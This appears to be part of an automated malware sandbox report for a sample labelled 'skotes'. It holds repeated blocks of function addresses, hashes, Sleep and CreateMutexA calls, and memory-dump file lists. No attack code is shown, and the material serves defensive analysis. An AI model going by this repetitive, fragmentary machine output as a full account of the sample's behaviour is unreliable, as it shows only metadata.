Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 7d71c22619f7af742200c025540d7b2c101e7562a5707151645d7a5a1ac2b976
Instruction ID: 341c4a60236b01e9df6d4e05a783aa5c8340d06f04b237e7b35f458894ec7aba
Opcode Fuzzy Hash: 7d71c22619f7af742200c025540d7b2c101e7562a5707151645d7a5a1ac2b976
Instruction Fuzzy Hash: 11312831A05210DBEB089B7CEDC976DBBE2EBC6314F248698E01CDB3D6C77599808752

Function 00B29F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 140c51b9f040100aec6bec87ab122661bbaedf927e5b68fc0013890d7d36bea6
Instruction ID: 9f10763e5358cac44c59dfb29c6f1fd3eabb3aa762519643f5792d67ac38736b
Opcode Fuzzy Hash: 140c51b9f040100aec6bec87ab122661bbaedf927e5b68fc0013890d7d36bea6
Instruction Fuzzy Hash: E5314A316012109BEB189B7CEDD97ADB7E2EBC6314F204699E01CDB3D1D775A9C08752

Function 00B2A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e004196e5a6ffb7adc183e47f5f6e495d2726cd3d483d961ae517b9d2a4a71fe
Instruction ID: aa0a3b9ce9ee812a77cc9100c6392ae7e809f1a4e80cb681febd56eb3bc0fea6
Opcode Fuzzy Hash: e004196e5a6ffb7adc183e47f5f6e495d2726cd3d483d961ae517b9d2a4a71fe
Instruction Fuzzy Hash: C7314831A012109BEB089B7CEDC976DB7E2DBC6314F204698E01CEB3D5C77699808753

Function 00B2A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 051060f13efe0a7d8fc5151452429ccaa40dc3c250a4fde2135d6daea825b212
Instruction ID: 45c3f0d0a3f853fe3409c77308f8a3e292dda11e157f10a57516b6cd33d5a829
Opcode Fuzzy Hash: 051060f13efe0a7d8fc5151452429ccaa40dc3c250a4fde2135d6daea825b212
Instruction Fuzzy Hash: 7E311631A01210DBEB089B6CEDC976DB7E2EBC6314F244698E018EB3D1D77699C08753

Function 00B2A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ed671939b7dcd3a2edc5a50ca8ffe3a17082154e6a20ca06b9a85e75153a6b1c
Instruction ID: b1436f805d5a53c8c9b977a62bd955276d6b012ffeb3aa51444914d77532da1c
Opcode Fuzzy Hash: ed671939b7dcd3a2edc5a50ca8ffe3a17082154e6a20ca06b9a85e75153a6b1c
Instruction Fuzzy Hash: 63311931A012109BEB08AB7CEC8976DB7E2EBC6314F204698E428DB3D5DB7599C08753

Function 00B2A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
